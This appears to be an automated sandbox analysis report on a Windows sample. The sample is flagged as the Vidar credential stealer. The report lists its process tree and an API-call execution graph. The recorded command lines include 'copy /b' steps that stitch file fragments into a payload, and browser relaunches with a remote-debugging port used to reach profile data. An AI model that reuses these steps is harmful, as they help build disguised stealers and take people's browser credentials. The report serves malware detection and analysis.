                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                                  Start time:01:00:00
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:extrac32 /Y /E Authorization
                                                                                                                                                                                                                                                                                                  Imagebase:0xd20000
                                                                                                                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                                  Start time:01:00:01
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr /V "aid" Division
                                                                                                                                                                                                                                                                                                  Imagebase:0x7c0000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                                  Start time:01:00:01
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                  Start time:01:00:01
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                                  Start time:01:00:01
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:Inf.com m
                                                                                                                                                                                                                                                                                                  Imagebase:0xa10000
                                                                                                                                                                                                                                                                                                  File size:947'288 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                                  Start time:01:00:02
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                  Imagebase:0xd50000
                                                                                                                                                                                                                                                                                                  File size:28'160 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                                                  Start time:01:00:54
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                                  Start time:01:00:55
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2028,i,9558792887393012280,750728347199566244,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                                  Start time:01:01:08
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                                                  Start time:01:01:09
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                                                  Start time:01:01:10
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2348,i,16825700261060781497,4542343586263828096,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                                                  Start time:01:01:10
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2176,i,2777762876112308581,5901726477067019011,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                                                  Start time:01:01:19
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff757150000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                                                  Start time:01:01:20
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2240,i,2906549977917240690,4367615623914022411,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                                                  Start time:01:01:20
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                                                  Start time:01:01:21
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                                                  Start time:01:01:25
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6504 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                                                  Start time:01:01:25
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                    Execution Coverage:18.3%
                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                    Signature Coverage:20.9%
                                                                                                                                                                                                                                                                                                    Total number of Nodes:1481
                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:24
                                                                                                                                                                                                                                                                                                    execution_graph 4174 402fc0 4175 401446 18 API calls 4174->4175 4176 402fc7 4175->4176 4177 401a13 4176->4177 4178 403017 4176->4178 4179 40300a 4176->4179 4181 406831 18 API calls 4178->4181 4180 401446 18 API calls 4179->4180 4180->4177 4181->4177 4182 4023c1 4183 40145c 18 API calls 4182->4183 4184 4023c8 4183->4184 4187 407296 4184->4187 4190 406efe CreateFileW 4187->4190 4191 406f30 4190->4191 4192 406f4a ReadFile 4190->4192 4193 4062cf 11 API calls 4191->4193 4194 4023d6 4192->4194 4197 406fb0 4192->4197 4193->4194 4195 406fc7 ReadFile lstrcpynA lstrcmpA 4195->4197 4198 40700e SetFilePointer ReadFile 4195->4198 4196 40720f CloseHandle 4196->4194 4197->4194 4197->4195 4197->4196 4199 407009 4197->4199 4198->4196 4200 4070d4 ReadFile 4198->4200 4199->4196 4201 407164 4200->4201 4201->4199 4201->4200 4202 40718b SetFilePointer GlobalAlloc ReadFile 4201->4202 4203 4071eb lstrcpynW GlobalFree 4202->4203 4204 4071cf 4202->4204 4203->4196 4204->4203 4204->4204 4205 401cc3 4206 40145c 18 API calls 4205->4206 4207 401cca lstrlenW 4206->4207 4208 4030dc 4207->4208 4209 4030e3 4208->4209 4211 405f7d wsprintfW 4208->4211 4211->4209 4212 401c46 4213 40145c 18 API calls 4212->4213 4214 401c4c 4213->4214 4215 4062cf 11 API calls 4214->4215 4216 401c59 4215->4216 4217 406cc7 81 API calls 4216->4217 4218 401c64 4217->4218 4219 403049 4220 401446 18 API calls 4219->4220 4221 403050 4220->4221 4222 406831 18 API calls 4221->4222 4223 401a13 4221->4223 4222->4223 4224 40204a 4225 401446 18 API calls 4224->4225 4226 402051 IsWindow 4225->4226 4227 4018d3 4226->4227 4228 40324c 4229 403277 4228->4229 4230 40325e SetTimer 4228->4230 4231 4032cc 4229->4231 4232 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4229->4232 4230->4229 4232->4231 4233 4022cc 4234 40145c 18 API calls 4233->4234 4235 4022d3 4234->4235 4236 406301 2 API calls 4235->4236 4237 4022d9 4236->4237 4239 4022e8 4237->4239 4242 405f7d wsprintfW 4237->4242 4240 4030e3 4239->4240 4243 405f7d wsprintfW 4239->4243 4242->4239 4243->4240 4244 4030cf 4245 40145c 18 API calls 4244->4245 4246 4030d6 4245->4246 4248 4030dc 4246->4248 4251 4063d8 GlobalAlloc lstrlenW 4246->4251 4249 4030e3 4248->4249 4278 405f7d wsprintfW 4248->4278 4252 406460 4251->4252 4253 40640e 4251->4253 4252->4248 4254 40643b GetVersionExW 4253->4254 4279 406057 CharUpperW 4253->4279 4254->4252 4255 40646a 4254->4255 4256 406490 LoadLibraryA 4255->4256 4257 406479 4255->4257 4256->4252 4260 4064ae GetProcAddress GetProcAddress GetProcAddress 4256->4260 4257->4252 4259 4065b1 GlobalFree 4257->4259 4261 4065c7 LoadLibraryA 4259->4261 4262 406709 FreeLibrary 4259->4262 4263 406621 4260->4263 4267 4064d6 4260->4267 4261->4252 4265 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4261->4265 4262->4252 4264 40667d FreeLibrary 4263->4264 4266 406656 4263->4266 4264->4266 4265->4263 4270 406716 4266->4270 4275 4066b1 lstrcmpW 4266->4275 4276 4066e2 CloseHandle 4266->4276 4277 406700 CloseHandle 4266->4277 4267->4263 4268 406516 4267->4268 4269 4064fa FreeLibrary GlobalFree 4267->4269 4268->4259 4271 406528 lstrcpyW OpenProcess 4268->4271 4273 40657b CloseHandle CharUpperW lstrcmpW 4268->4273 4269->4252 4272 40671b CloseHandle FreeLibrary 4270->4272 4271->4268 4271->4273 4274 406730 CloseHandle 4272->4274 4273->4263 4273->4268 4274->4272 4275->4266 4275->4274 4276->4266 4277->4262 4278->4249 4279->4253 4280 4044d1 4281 40450b 4280->4281 4282 40453e 4280->4282 4348 405cb0 GetDlgItemTextW 4281->4348 4283 40454b GetDlgItem GetAsyncKeyState 4282->4283 4287 4045dd 4282->4287 4285 40456a GetDlgItem 4283->4285 4298 404588 4283->4298 4290 403d6b 19 API calls 4285->4290 4286 4046c9 4346 40485f 4286->4346 4350 405cb0 GetDlgItemTextW 4286->4350 4287->4286 4295 406831 18 API calls 4287->4295 4287->4346 4288 404516 4289 406064 5 API calls 4288->4289 4291 40451c 4289->4291 4293 40457d ShowWindow 4290->4293 4294 403ea0 5 API calls 4291->4294 4293->4298 4299 404521 GetDlgItem 4294->4299 4300 40465b SHBrowseForFolderW 4295->4300 4296 4046f5 4301 4067aa 18 API calls 4296->4301 4297 403df6 8 API calls 4302 404873 4297->4302 4303 4045a5 SetWindowTextW 4298->4303 4307 405d85 4 API calls 4298->4307 4304 40452f IsDlgButtonChecked 4299->4304 4299->4346 4300->4286 4306 404673 CoTaskMemFree 4300->4306 4311 4046fb 4301->4311 4305 403d6b 19 API calls 4303->4305 4304->4282 4309 4045c3 4305->4309 4310 40674e 3 API calls 4306->4310 4308 40459b 4307->4308 4308->4303 4315 40674e 3 API calls 4308->4315 4312 403d6b 19 API calls 4309->4312 4313 404680 4310->4313 4351 406035 lstrcpynW 4311->4351 4316 4045ce 4312->4316 4317 4046b7 SetDlgItemTextW 4313->4317 4322 406831 18 API calls 4313->4322 4315->4303 4349 403dc4 SendMessageW 4316->4349 4317->4286 4318 404712 4320 406328 3 API calls 4318->4320 4329 40471a 4320->4329 4321 4045d6 4323 406328 3 API calls 4321->4323 4324 40469f lstrcmpiW 4322->4324 4323->4287 4324->4317 4327 4046b0 lstrcatW 4324->4327 4325 40475c 4352 406035 lstrcpynW 4325->4352 4327->4317 4328 404765 4330 405d85 4 API calls 4328->4330 4329->4325 4333 40677d 2 API calls 4329->4333 4335 4047b1 4329->4335 4331 40476b GetDiskFreeSpaceW 4330->4331 4334 40478f MulDiv 4331->4334 4331->4335 4333->4329 4334->4335 4336 40480e 4335->4336 4353 4043d9 4335->4353 4337 404831 4336->4337 4339 40141d 80 API calls 4336->4339 4361 403db1 KiUserCallbackDispatcher 4337->4361 4339->4337 4340 4047ff 4342 404810 SetDlgItemTextW 4340->4342 4343 404804 4340->4343 4342->4336 4345 4043d9 21 API calls 4343->4345 4344 40484d 4344->4346 4362 403d8d 4344->4362 4345->4336 4346->4297 4348->4288 4349->4321 4350->4296 4351->4318 4352->4328 4354 4043f9 4353->4354 4355 406831 18 API calls 4354->4355 4356 404439 4355->4356 4357 406831 18 API calls 4356->4357 4358 404444 4357->4358 4359 406831 18 API calls 4358->4359 4360 404454 lstrlenW wsprintfW SetDlgItemTextW 4359->4360 4360->4340 4361->4344 4363 403da0 SendMessageW 4362->4363 4364 403d9b 4362->4364 4363->4346 4364->4363 4365 401dd3 4366 401446 18 API calls 4365->4366 4367 401dda 4366->4367 4368 401446 18 API calls 4367->4368 4369 4018d3 4368->4369 4370 402e55 4371 40145c 18 API calls 4370->4371 4372 402e63 4371->4372 4373 402e79 4372->4373 4374 40145c 18 API calls 4372->4374 4375 405e5c 2 API calls 4373->4375 4374->4373 4376 402e7f 4375->4376 4400 405e7c GetFileAttributesW CreateFileW 4376->4400 4378 402e8c 4379 402f35 4378->4379 4380 402e98 GlobalAlloc 4378->4380 4383 4062cf 11 API calls 